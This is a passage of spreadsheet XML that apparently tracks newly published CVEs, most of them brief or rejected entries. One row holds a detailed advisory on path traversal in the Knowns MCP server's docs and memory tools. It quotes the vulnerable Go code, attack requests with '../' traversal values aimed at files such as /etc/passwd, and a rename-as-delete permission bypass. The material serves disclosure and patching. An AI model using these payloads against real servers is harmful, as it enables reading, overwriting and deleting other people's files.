      <c r="S468" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60101</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7799</t>
        </is>
      </c>
      <c r="D469" s="5" t="inlineStr"/>
      <c r="E469" s="5" t="inlineStr"/>
      <c r="F469" s="5" t="inlineStr"/>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="inlineStr"/>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr"/>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q469" s="5" t="inlineStr"/>
      <c r="R469" s="5" t="inlineStr"/>
      <c r="S469" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7799</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7800</t>
        </is>
      </c>
      <c r="D470" s="5" t="inlineStr"/>
      <c r="E470" s="5" t="inlineStr"/>
      <c r="F470" s="5" t="inlineStr"/>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="inlineStr"/>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q470" s="5" t="inlineStr"/>
      <c r="R470" s="5" t="inlineStr"/>
      <c r="S470" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7800</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86439</t>
        </is>
      </c>
      <c r="D471" s="5" t="inlineStr"/>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr">
        <is>
          <t>npm:knowns</t>
        </is>
      </c>
      <c r="M471" s="5" t="inlineStr">
        <is>
          <t>0.30.0</t>
        </is>
      </c>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q471" s="5" t="inlineStr"/>
      <c r="R471" s="5" t="inlineStr"/>
      <c r="S471" s="5" t="inlineStr">
        <is>
          <t>## Overview
Verified. Multiple **Unrestricted Path Traversal** vulnerabilities exist in the Knowns MCP `docs` and `memory` tools, allowing arbitrary file read, write, and deletion operations outside the project sandbox. The storage layer functions (`Get`, `Create`, `Update`, `Rename`, `Delete`) in both `doc_store.go` and `memory_store.go` concatenate user-controlled paths with `filepath.Join()` without any containment validation. 
Additionally, the `docs.update` action with a `newPath` parameter performs a file deletion via `Rename()`, but is classified as `CapWrite` in the permission registry rather than `CapDelete`. This allows an attacker with a `read-write-no-delete` preset to bypass deletion restrictions and destroy arbitrary files outside the project root.
## Affected paths
| File Path | Role | Vulnerability &amp; Execution Impact |
| :--- | :--- | :--- |
| **`internal/storage/doc_store.go`** | Vulnerable Sink (Docs) | **Path Traversal in File Operations (CWE-22):** `Get()`, `Create()`, `Update()`, `Rename()`, `Delete()` join user-controlled `path` with `filepath.Join(ds.docsDir(), ...)` without validating path containment. |
| **`internal/storage/memory_store.go`** | Vulnerable Sink (Memory) | **Path Traversal in Memory Operations (CWE-22):** `GetInLayer()`, `Create()`, `Update()`, `Delete()` join user-controlled `id` with `filepath.Join(dir, models.MemoryFileName(id))` without validation. |
| **`internal/mcp/handlers/doc.go`** | Pass-Through Handler | **Unsanitized Input Propagation:** MCP handlers pass user-supplied `path`, `folder`, `newPath` directly to storage layer without sanitization. |
| **`internal/mcp/handlers/memory.go`** | Pass-Through Handler | **Unsanitized Input Propagation:** MCP handlers pass user-supplied `id` directly to storage layer without sanitization. |
| **`internal/permissions/registry.go`** | Authorization Bypass | **Capability Misclassification (CWE-863):** `docs.update` with `newPath` performs file deletion but is classified as `CapWrite`, bypassing `CapDelete` restrictions. |
## Root Cause
### Missing Path Containment in DocStore
In `internal/storage/doc_store.go`, all file operations use `filepath.Join()` to construct absolute paths without validating that the resolved path remains within `docsDir()`:
```go
// Get retrieves a doc by its relative path (without .md extension).
func (ds *DocStore) Get(path string) (*models.Doc, error) {
    path = strings.TrimPrefix(path, "/")
    path = strings.TrimSuffix(path, ".md")
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(path)+".md")
    if _, err := os.Stat(absPath); err == nil {
        // ...
        return ds.parseFile(absPath, path, folder, false, "")
    }
    // ...
}
// Create writes a new doc to .knowns/docs/{path}.md.
func (ds *DocStore) Create(doc *models.Doc) error {
    if doc.Path == "" {
        return fmt.Errorf("doc path is required")
    }
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(doc.Path)+".md")
    if err := os.MkdirAll(filepath.Dir(absPath), 0755); err != nil {
        return fmt.Errorf("create doc dir: %w", err)
    }
    return ds.writeFile(absPath, doc)
}
// Rename rewrites a doc to a new path and removes the old file.
func (ds *DocStore) Rename(oldPath string, doc *models.Doc) error {
    // ...
    oldAbsPath := filepath.Join(ds.docsDir(), filepath.FromSlash(strings.TrimSuffix(oldPath, ".md"))+".md")
    newAbsPath := filepath.Join(ds.docsDir(), filepath.FromSlash(strings.TrimSuffix(doc.Path, ".md"))+".md")
    // ...
    if err := ds.writeFile(newAbsPath, doc); err != nil {
        return err
    }
    if oldAbsPath != newAbsPath {
        // VULNERABLE: Deletes file at oldAbsPath (can be outside docsDir)
        if err := os.Remove(oldAbsPath); err != nil &amp;&amp; !os.IsNotExist(err) {
            return err
        }
    }
    return nil
}
// Delete removes a doc file.
func (ds *DocStore) Delete(path string) error {
    path = strings.TrimSuffix(path, ".md")
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(path)+".md")
    return os.Remove(absPath)
}
```
**Critical Flaws:**
- `filepath.Join` resolves `../` sequences natively
- No post-Join prefix check (e.g., `strings.HasPrefix(absPath, ds.docsDir())`)
- No rejection of absolute paths or path traversal sequences
- `Rename()` performs file deletion via `os.Remove(oldAbsPath)`, which can target files outside the docs directory
### Missing Path Containment in MemoryStore
In `internal/storage/memory_store.go`, memory operations similarly lack path validation:
```go
// GetInLayer retrieves a memory entry by ID from a specific layer only.
func (ms *MemoryStore) GetInLayer(id, layer string) (*models.MemoryEntry, error) {
    // ...
    dir, err := ms.dirForLayer(layer)
    if err != nil {
        return nil, err
    }
    // VULNERABLE: No containment check for id containing "../"
    absPath := filepath.Join(dir, models.MemoryFileName(id))
    if _, err := os.Stat(absPath); err != nil {
        return nil, fmt.Errorf("memory %q not found in %s layer", id, layer)
    }
    return ms.parseFile(absPath, layer)
}
// Create writes a new memory entry to the appropriate layer directory.
func (ms *MemoryStore) Create(entry *models.MemoryEntry) error {
    // ...
    dir, err := ms.dirForLayer(entry.Layer)
    if err != nil {
        return err
    }
    if err := os.MkdirAll(dir, 0755); err != nil {
        return fmt.Errorf("create memory dir: %w", err)
    }
    // VULNERABLE: No containment check for entry.ID containing "../"
    absPath := filepath.Join(dir, models.MemoryFileName(entry.ID))
    return atomicWrite(absPath, []byte(renderMemory(entry)))
}
// Delete removes a memory entry by ID.
func (ms *MemoryStore) Delete(id string) error {
    // ...
    filename := models.MemoryFileName(id)
    dirs := []string{ms.projectDir(), ms.globalDir()}
    for _, dir := range dirs {
        // VULNERABLE: No containment check
        absPath := filepath.Join(dir, filename)
        if _, err := os.Stat(absPath); err == nil {
            return os.Remove(absPath)
        }
    }
    return fmt.Errorf("memory %q not found", id)
}
```
### Authorization Bypass via Rename-as-Delete
In `internal/mcp/handlers/doc.go`, the `handleDocUpdate()` function accepts a `newPath` parameter that triggers a rename operation:
```go
func handleDocUpdate(getStore func() *storage.Store, req mcp.CallToolRequest) (*mcp.CallToolResult, error) {
    // ...
    if v, ok := stringArg(args, "newPath"); ok &amp;&amp; strings.TrimSpace(v) != "" {
        doc.Path = strings.Trim(strings.TrimSuffix(v, ".md"), "/")
    }
    // ...
    if oldPath != doc.Path {
        if err := store.Docs.Rename(oldPath, doc); err != nil {
            return errFailed("rename doc", err)
        }
        // ...
    }
    // ...
}
```
The `Rename()` function in `doc_store.go` performs file deletion:
```go
if oldAbsPath != newAbsPath {
    if err := os.Remove(oldAbsPath); err != nil &amp;&amp; !os.IsNotExist(err) {
        return err
    }
}
```
However, in `internal/permissions/registry.go`, `docs.update` is classified as `CapWrite`:
```go
"docs.update":  {Capability: CapWrite, Target: TargetDoc, Risk: RiskMedium},
```
This allows an attacker with a `read-write-no-delete` preset (which permits `CapWrite` but denies `CapDelete`) to delete files by using `docs.update` with a `newPath` parameter.
## Attack Vector
| Phase | Request / Action | Effect |
| :--- | :--- | :--- |
| **1. Arbitrary File Read** | `docs.get` with `path="../../../victim/secret"` | Server reads file outside project root via path traversal in `DocStore.Get()`. |
| **2. Arbitrary File Write** | `docs.create` with `folder="../../../victim"` | Server writes file outside project root via path traversal in `DocStore.Create()`. |
| **3. Arbitrary File Delete** | `docs.update` with `path="../outside/secret.md"` and `newPath="../../../victim/renamed.md"` | Server deletes file outside project root via path traversal in `DocStore.Rename()`. Bypasses `CapDelete` restriction because `docs.update` is classified as `CapWrite`. |
| **4. Memory File Read/Write** | `memory.update` with `id="x/../../../../victim/secret"` | Server reads and overwrites file outside project root via path traversal in `MemoryStore.Update()`. |
## Analysis
### Classic Path Traversal Pattern
Both `DocStore` and `MemoryStore` follow the same vulnerable pattern: user-controlled input is concatenated with a base directory using `filepath.Join()`, then passed directly to file system operations (`os.ReadFile`, `os.WriteFile`, `os.Remove`, `os.Stat`) without any validation.
```go
absPath := filepath.Join(baseDir, filepath.FromSlash(userInput))
// No containment check: strings.HasPrefix(absPath, baseDir)
// No rejection of ".." or absolute paths
```
`filepath.Join` resolves `../` sequences, allowing attackers to escape the intended directory:
- Input: `"../../../etc/passwd"`
- Result: `/project/.knowns/docs/../../../etc/passwd` → `/etc/passwd`
### Rename-as-Delete Authorization Bypass
The `Rename()` function performs two operations:
1. Write the file to the new location (`newAbsPath`)
2. Delete the file from the old location (`oldAbsPath`)
Both paths are vulnerable to traversal. An attacker can:
- Set `path` to a file outside the project (e.g., `"../../../victim/target.md"`)
- Set `newPath` to another location outside the project
- The `Rename()` function will delete the file at `path` (outside the project)
Because `docs.update` is classified as `CapWrite` rather than `CapDelete`, this operation bypasses deletion restrictions in `read-write-no-delete` presets.
### Compounding Factor - Unauthenticated Access
Due to the previously identified **Auth Bypass** vulnerability, all MCP tools are accessible without credentials when the server is started without a password, making this a zero-credential attack.
## Fix
*Patch is available right now at [New Release](https://github.com/knowns-dev/knowns/releases).*</t>
        </is>
      </c>
      <c r="T471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86439</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88389</t>
        </is>
      </c>
      <c r="D472" s="5" t="inlineStr"/>
      <c r="E472" s="5" t="inlineStr"/>
      <c r="F472" s="5" t="inlineStr"/>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="inlineStr"/>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr"/>
      <c r="S472" s="5" t="inlineStr">
        <is>
          <t>Espruino 2v29 (commit bffc6d0) contains a NULL pointer dereference vulnerability in jslGetRawString() in src/jslex.c. Crafted raw/binary string input can cause the lexer to pass a NULL iterator target to jsvLockAgain(). In RELEASE/NO_ASSERT builds, the missing assertion guard allows a write through the NULL pointer, resulting in memory corruption and application termination or denial of service.</t>
        </is>
      </c>
      <c r="T472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88389</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88420</t>
        </is>
      </c>
      <c r="D473" s="5" t="inlineStr"/>
      <c r="E473" s="5" t="inlineStr"/>
      <c r="F473" s="5" t="inlineStr"/>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="inlineStr"/>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr"/>
      <c r="S473" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability in the EntryAbstract.save() component of APSL puput v1.2.1 through v2.2.0 allows authenticated attackers with Wagtail Editor privileges to execute arbitrary code in the context of the victim's browser via a crafted payload.</t>
        </is>
      </c>
      <c r="T473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88420</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92564</t>
        </is>
      </c>
      <c r="D474" s="5" t="inlineStr"/>
      <c r="E474" s="5" t="inlineStr"/>
      <c r="F474" s="5" t="inlineStr"/>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S474" s="5" t="inlineStr">
        <is>
          <t>A pre-authentication attacker could leverage type nesting to cause a StackOverflowError potentially leading to denial of service.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92564</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9313</t>
        </is>
      </c>
      <c r="D475" s="5" t="inlineStr"/>
      <c r="E475" s="5" t="inlineStr"/>
      <c r="F475" s="5" t="inlineStr"/>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q475" s="5" t="inlineStr"/>
      <c r="R475" s="5" t="inlineStr"/>
      <c r="S475" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9313</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9652</t>
        </is>
      </c>
      <c r="D476" s="5" t="inlineStr"/>
      <c r="E476" s="5" t="inlineStr"/>
      <c r="F476" s="5" t="inlineStr"/>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="inlineStr"/>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr"/>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr"/>
      <c r="S476" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9652</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9655</t>
        </is>
      </c>
      <c r="D477" s="5" t="inlineStr"/>
      <c r="E477" s="5" t="inlineStr"/>
      <c r="F477" s="5" t="inlineStr"/>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr"/>
      <c r="S477" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9655</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97522</t>
        </is>
      </c>
      <c r="D478" s="5" t="inlineStr"/>
      <c r="E478" s="5" t="inlineStr"/>
      <c r="F478" s="5" t="inlineStr"/>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="inlineStr"/>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr"/>
      <c r="S478" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: fix bad accounting in __mptcp_subflow_push_pending()
If __subflow_push_pending() errors out we should avoid updating the
copied byte counters, to avoid mismatch push call later on.</t>
        </is>
      </c>
      <c r="T478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97522</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97526</t>
        </is>
      </c>
      <c r="D479" s="5" t="inlineStr"/>
      <c r="E479" s="5" t="inlineStr"/>
      <c r="F479" s="5" t="inlineStr"/>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr"/>
      <c r="S479" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/pai: Support CPU hotplug for PMU PAI
The command 'perf stat -e pai_crypto/CRYPTO_ALL/ -- &lt;command&gt;'
crashes the kernel when CPUs are hotplug added during that run.
Root cause is the missing allocation of per-CPU data structures
for that new CPU. The allocation is dynamic and the first
event that has task context creates such a structure for
each online CPU. This is not sufficient. CPUs may be offline
during event creation and can be set online during the
perf run time. For example commands
 # echo 0 &gt; /sys/devices/system/cpu/cpu1/online
 # perf stat -e cycles -i -- stress-ng -t10s --matrix X
 # sleep 1
 # echo 1 &gt; /sys/devices/system/cpu/cpu1/online
Currently without a CPU hotplug handler, that new CPU has no
per-CPU data infrastructure. The scheduler runs PMU call back
function pai_add() to install the PMU support for that CPU before
the task is being scheduled on that new CPU.
In pai_add() instructions
    mp = this_cpu_ptr(pai_root[idx].mapptr);
    cpump = mp-&gt;mapptr;
return a NULL pointer and the result is a kernel panic as variable
cpump is used inside that function.
Add CPU hotplug support for CPU add and delete and create
the necessary per-CPU data infrastructure during CPU hotplug
add processing. Same for CPU hotplug remove.
This is done when the CPU is offline to ensure the data structures
are available when CPU is made online and tasks are scheduled on it.
[hca@linux.ibm.com: fixup error path in pai_init()]</t>
        </is>
      </c>
      <c r="T479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97526</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97529</t>
        </is>
      </c>
      <c r="D480" s="5" t="inlineStr"/>
      <c r="E480" s="5" t="inlineStr"/>
      <c r="F480" s="5" t="inlineStr"/>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr"/>
      <c r="S480" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Validate BSG request_len before reading vendor_cmd[]
The FC BSG transport allocates job-&gt;request via memdup_user() using the
exact user-supplied request_len. For FC_BSG_HST_VENDOR,
fc_bsg_host_dispatch() only guarantees request_len covers msgcode and
vendor_id; it does not account for the vendor_cmd[] flexible array.
qla2xxx then reads the command selector vendor_cmd[0] and, in several
sub-handlers, vendor_cmd[1]/[2] or structures overlaid on the vendor
command area without verifying request_len. A caller holding
CAP_SYS_RAWIO can submit a short request whose vendor_id matches the
host, triggering out-of-bounds heap reads (KASAN-detectable, and able to
mis-select a command or panic).
Add a central guard in qla2x00_process_vendor_specific() so the selector
is always in bounds, restrict the early vendor_cmd[0] read in
qla24xx_bsg_request() to sufficiently long vendor messages, and add
request_len checks to the sub-handlers that read further:
qla24xx_proc_fcp_prio_cfg_cmd(), qla2x00_process_loopback(),
qla84xx_reset(), qla84xx_updatefw(), qla2x00_read_optrom(),
qla2x00_update_optrom(), qlafx00_mgmt_cmd() and
qla28xx_validate_flash_image().</t>
        </is>
      </c>
      <c r="T480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97529</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97530</t>
        </is>
      </c>
